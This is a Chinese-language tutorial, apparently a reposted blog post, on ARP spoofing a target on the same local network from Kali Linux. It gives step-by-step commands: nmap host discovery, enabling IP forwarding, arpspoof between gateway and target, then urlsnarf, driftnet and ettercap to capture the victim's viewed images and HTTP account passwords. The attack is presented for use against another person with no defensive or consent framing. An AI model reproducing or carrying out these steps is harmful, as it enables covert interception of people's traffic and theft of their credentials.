同局域网arp欺骗
同局域网arp欺骗
可以获取对方访问的 http图片,http账号和密码
虚拟机下kali系统
见另一篇文章见虚拟机安装kali系统
发现目标
和目标机在同一局域网下。
查看本机网络配置
- 方法1
iwconfih
- 方法2
ifconfig
nmap扫描网段发现目标
nmap 192.168.1.0/24
- 附录
- 批量扫描一个网段的主机存活数
nmap -sP 192.168.1.0/24 - 跳过Ping探测
nmap -P0 192.168.1.0/24 - 扫描IP范围
nmap -sP 192.168.1.1-50
arpspoof欺骗目标
- 开启IP转发 让目标机能上网
将1写入到/proc/sys/net/ipv4/ip_forward
echo 1 > /proc/sys/net/ipv4/ip_forward
- 查看是否成功
cat /proc/sys/net/ipv4/ip_forward
返回 1 成功
- 开始欺骗
arpspoof -i 网卡 -t 网关ip 目标ip
arpspoof -i wlan0 -t 192.168.1.1 192.168.1.2
现在目标机的数据就会经过,本机。
获取目标机访问的图片
命令行
urlsnarf -i wlan0
driftnet获取目标图片
新建终端窗口 ctrl+shift+T。保持 ARP欺骗
语法: driftnet [options] [filter code]
- 主要参数:
| options | filter code |
|---|---|
| -b | 捕获到新的图片时发出嘟嘟声 |
| -i interface | 选择监听接口 |
| -f | file |
| -p | 不让所监听的接口使用混杂模式 |
| -a | 后台模式,将捕获的图片保存到目录中(不会显示在屏幕上) |
| -m number | 指定保存图片数的数目 |
| -d directory | 指定保存图片的路径 |
| -x prefix | 指定保存图片的前缀名 |
- 使用举例:
- 实时监听:
driftnet -i wlan0
- 保存所有图片到本地
driftnet -i wlan0 -d /home/abc/图片/wifi -a
获取目标账号密码
新建终端窗口 ctrl+shift+T 保持 ARP欺骗
获取目标机在 http 网址输入的账号,密码
ettercap -Tq -i wlan0
原文作者: ababwbq
原文链接: https://www.unkaer.cf/arp.html
版权声明: 转载请注明出处(必须保留原文作者署名原文链接)

